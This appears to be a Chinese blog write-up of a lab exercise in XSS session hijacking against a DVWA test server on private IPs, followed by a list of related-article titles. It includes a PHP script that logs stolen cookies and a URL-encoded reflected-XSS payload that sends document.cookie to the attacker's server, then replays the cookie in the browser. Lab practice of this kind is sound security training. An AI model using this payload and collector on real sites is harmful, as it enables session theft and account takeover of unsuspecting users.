xss-劫持会话攻击实验
Step01: 搭建好攻击者的Web服务器(LAMP或LNMP平台,phpstudy)
http://192.168.195.127/cookie.php
验证PHP环境
(1)看端口
Web:80
mysql:3306
php:9000
(2)验证PHP文件能不能正常解析
网站的根目录 c:\phpstudy_pro\www
创建一个test.php文件

<?php phpinfo() ?>

Step02:在攻击者的Web服务器的网站根目录下创建cookie.php

<?php $cookie=$_GET['cookie']; file_put_contents('cookie.txt',$cookie); ?>

//把获取到的用户cookie写入到cookie.txt文件中
//网站主目录对于Web用户来说要有写入的权限
http://192.168.195.127/cookie.php

(3)验证web页面是否有xss漏洞攻击

(4)构造攻击js

//document.location 将页面内容定位到指定位置

(5)构造并发送攻击URL
http://192.168.195.129/dvwa/vulnerabilities/xss_r/?name=
(6)URL编码
http%3a%2f%2f192.168.195.129%2fdvwa%2fvulnerabilities%2fxss_r%2f%3fname%3d%3cscript%3edocument.location%3d’http%3a%2f%2f127.0.0.1%2fcookie.php%3fcookie%3d’%2bdocument.cookie%3b%3c%2fscript%3e
获得cookie
http://127.0.0.1/cookie.txt(有内容了)
劫持会话
(7)在Kali中打开登录dvwa的页面
F12更改cookie(存储位置)
192.168.195.129/dvwa/index.php

理解xss-劫持会话相关推荐

  1. 深入理解XSS攻击与防御

    深入理解XSS攻击与防御 What is XSS XSS攻击的类型 XSS攻击原理 XSS攻击危害 XSS攻击方法 How to defense XSS 防御原则:永远不要相信用户的输入. 防御措施 ...

  2. 这一次,彻底理解XSS攻击

    希望读完本文大家彻底理解XSS攻击,如果读完本文还不清楚,我请你吃饭慢慢告诉你~ 话不多说,我们进入正题. 一.简述 跨站脚本(Cross-site scripting,简称为:CSS, 但这会与层叠 ...

  3. JavaWeb-WEB核心7 会话技术 理解什么是会话跟踪技术掌握Cookie的使用掌握Session的使用(钝化、活化)完善用户登录注册案例的功能

    会话技术 今日目标 理解什么是会话跟踪技术 掌握Cookie的使用 掌握Session的使用 完善用户登录注册案例的功能 1,会话跟踪技术的概述 对于会话跟踪这四个词,我们需要拆开来进行解释,首先要理 ...

  4. 什么是http劫持?如何理解http劫持

    学习网络安全方面的知识,我们常遇到一种典型的网络攻击方式:DNS劫持.也就是标题所说的http劫持.如何理解它呢?请继续往下阅 在以前,我们登陆一个网站,要输入一个网站的IP(一段较长的数字组合)而不 ...

  5. xss劫持 HTML 表单,XSS 之 form表单劫持(通用明文记录)

    [注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!] 很多时候大家可能某一时刻特别想知道管理员的密码,就算你拿下webshell了,数据库的密码也是加密的,解开会超级麻烦, ...

  6. 【渗透案例】上班摸鱼误入陌生网址——结果被XSS劫持了

    beef介绍 BeeF是前欧美最流行的web框架渗透测试平台,parrot和kali等渗透测试系统,都集成Beef,而且Beef有很多好使的payload. 例如,通过XSS这个简单,BeeF可以通过 ...

  7. 解析php.ini 中文版

    php.ini对应的内容如下: ;;;;;;;;;;;; ;;  语法  ;; ;;;;;;;;;;;; ; 该文件的语法非常简单.空白字符和以分号开始的行被简单地忽略. ; 章节标题(例如: [ph ...

  8. 【XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF

    目录 1 案例简介 1.1 案例目的 1.2 案例环境 2 案例一:浏览器劫持 2.1 概述 2.2 案例步骤 3 案例二:会话劫持 3.1 概述 3.2 案例步骤 4 案例三:GetShell 4. ...

  9. 【XSS漏洞07】基于神器beEF的XSS漏洞利用实验(浏览器劫持、会话劫持、GetShell)

    目录 1 实验简介 1.1 实验目的 1.2 实验环境 2 实验一:浏览器劫持 2.1 概述 2.2 实验步骤 3 实验二:会话劫持 3.1 概述 3.2 实验步骤 4 实验三:GetShell 4. ...

最新文章

  1. 【零基础】了解一下前端HTML与CSS
  2. 静态成员变量不占用类的内存空间
  3. 【原】unity shader(3)反射贴图
  4. 基于深度学习的磁环表面缺陷检测算法
  5. cad布局打印出图-01-模型空间打印
  6. 大地高、正高和正常高及高程异常
  7. matlab分析分子动力学,分子动力学程序框架
  8. Qt 局域网聊天工具
  9. (转)最大流最小割定理
  10. python数据可视化常用工具推荐
  11. 就业形势严峻,应届生应该如何做好职业规划?
  12. 比较线程子进程 占用的内存情况
  13. 数据仓库系列:初识数仓
  14. 关于sp和unity近似的PBR的一篇国外文章
  15. 如何使用HTML制作tab选项卡
  16. 计算机毕业设计android的云南旅游,美食攻略,产品预订app(源码+系统+mysql数据库+Lw文档)
  17. 广域网 (PPP协议 HDLC协议)、链路层设备
  18. 区块链在司法存证领域的应用报告 | 陀螺研究院
  19. maya 2019 mac版
  20. Android 开发之 ContentProvider 内容提供者

热门文章

  1. 西门子1200与WINCC上位机的通讯
  2. 节奏对于游戏配音的重要性
  3. Vue.js最最最基础入门的笔记整理
  4. python群发邮件并将excel附件添加到正文
  5. 2020电工(初级)考试题及电工(初级)考试题库
  6. List的containsAll()方法的正确理解
  7. AWStats安装笔记
  8. 简述计算机网络最重要的几点用途,简述计算机网络的主要功能。
  9. 大数据分页查询 or 导出 慢sql治理
  10. 开发小程序要多少钱?怎么算?